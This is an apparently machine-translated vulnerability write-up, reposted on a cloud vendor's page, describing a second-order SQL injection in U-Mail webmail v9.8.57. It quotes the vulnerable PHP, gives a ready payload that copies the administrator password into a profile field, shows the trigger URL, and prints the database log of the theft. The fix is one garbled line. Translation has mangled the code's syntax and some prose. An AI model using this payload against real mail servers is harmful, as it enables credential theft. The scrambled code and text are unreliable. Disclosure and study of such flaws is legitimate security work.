U-Mail system second injection 3 (no problem, you can get the administrator password)

Source: Internet
Author: User

U-Mail system second injection 3 (no problem, you can get the administrator password)

The second injection vulnerability in the U-Mail system allows you to directly obtain the administrator password.

Version: Latest Version v9.8.57

Vulnerability file/client/oab/module/operates. php code
 

If (ACTION = "save-to-pab") {include_once (LIB_PATH. "PAB. php "); $ PAB = PAB: getinstance (); $ maillist_id = gss ($ _ GET ['maillist']); if ($ maillist_id) {$ member_all = $ Maillist-> getMemberByMaillistID ($ maillist_id, "Mailbox, FullName", 0); if (! $ Member_all) {dump_json (array ("status" => TRUE, "message" => "");} foreach ($ member_all as $ member) {if (! $ PAB-> getContactByMail ($ user_id, $ member ['mailbox'], "contact_id", 0) {$ data = array ("user_id" => $ user_id, "fullname" => $ member ['fullname'], // second injection "pref_email" => $ member ['mailbox'], "updated" => date ("Y-m-d H: I: s"); $ res = $ PAB-> add_contact ($ data, 0); if (! $ Res) {dump_json (array ("status" => FALSE, "message" => el ("An error occurred while adding a contact. Adding failed! "," ") ;}}} Else {$ user_ids = gss ($ _ GET ['userlist']); $ user_ids = id_list_filter ($ user_ids ); // WooYun-2014-72963if (! $ User_ids) {dump_msg ("param_error", el ("parameter error! "," ") ;}$ Where =" t1.UserID IN (". $ user_ids. ")"; $ arr_tmp = $ Mailbox-> getMailboxInfo ($ domain_id, $ where, "", 0 ); $ user_all = $ arr_tmp ['data']; if (! $ User_all) {dump_json (array ("status" => TRUE, "message" => "");} foreach ($ user_all as $ user) {$ qq = $ msn = ""; if (strpos ($ user ['qqmsn '], "@") {$ msn = $ user ['qqmsn'];} else {$ qq = $ user ['qqmsn '];} if (! $ PAB-> getContactByMail ($ user_id, $ user ['email '], "contact_id", 0) {$ data = array ("user_id" => $ user_id, "fullname" => $ user ['fullname'], "pref_email" => $ user ['email '], "pref_tel" => $ user ['teleextension']? $ User ['teleextension']: $ user ['mobil '], "birthday" => $ user ['birthday'], "im_qq" => $ qq, "im_msn" => $ msn, "updated" => date ("Y-m-d H: I: s ")); $ res = $ PAB-> add_contact ($ data, 0); // second injection if (! $ Res) {dump_json (array ("status" => FALSE, "message" => el ("An error occurred while adding a contact. Adding failed! "," ") ;}}} Dump_json (array (" status "=> TRUE," message "=> ""));}



The vulnerability first introduces single quotes and databases. in personal data, enter the following exp,

', 'Homepage' = (SELECT password from userlist where userid = 2 )#
 



Http://mail.fuck.com/webmail/client/oab/index.php? Module = operate & action = member-get & page = 1 & orderby = & is_reverse = 1 & keyword = test2
 



Then execute the vulnerability function. The request is
 



View the personal address book and find the administrator password,
 



The SQL Execution Process is
 

150227 11:43:30 8724 Connectumail@localhost on  8724 QuerySET NAMES 'UTF8' 8724 Init DBumail 8724 QueryUPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='13' 8724 QueryUPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='13' 8724 Quit150227 11:46:10 8727 Connectumail@localhost on  8727 QuerySET NAMES 'UTF8' 8727 Init DBumail 8727 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13)ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 8727 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13)ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 8727 QuerySELECT contact_id FROM pab_contact WHERE user_id='13' AND pref_email='[email protected]' LIMIT 1 8727 QueryINSERT INTO pab_contact SET `user_id`='13',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='[email protected]',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-02-27 11:46:10' 8727 Quit

 

Solution:

Escape before warehouse receiving

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.